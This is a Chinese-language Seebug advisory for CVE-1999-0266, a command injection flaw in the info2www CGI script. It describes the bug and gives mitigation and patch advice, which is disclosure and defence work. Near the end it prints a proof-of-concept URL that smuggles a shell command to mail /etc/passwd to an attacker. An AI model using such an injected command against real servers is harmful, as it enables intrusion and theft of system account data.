Lucene search

K
seebugRootSSV:4291
HistoryOct 25, 2008 - 12:00 a.m.

RoarSmithinfo2www远程执行任意命令漏洞

2008-10-2500:00:00
Root
www.seebug.org
20

0.004 Low

EPSS

Percentile

74.4%

BugCVE: CVE-1999-0266
BUGTRAQ: 1995

“info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。

某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。

问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。

1.0-1.1
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

  • 如果不需要使用info2www脚本,去除此脚本的执行权限或删除之。

厂商补丁:

Roar Smith

程序作者已经在最新版的软件中修补了此安全漏洞,请到作者的主页下载:

<a href=“http://www.gnu.org/directory/gnats.html” target=“_blank”>http://www.gnu.org/directory/gnats.html</a>


                                                Niall Smart ([email protected])提供了如下测试方法:

访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。

http://target/cgi-bin/info2www?'(../../../bin/mail your@email &lt; /etc/passwd|)'

                              

0.004 Low

EPSS

Percentile

74.4%

Related for SSV:4291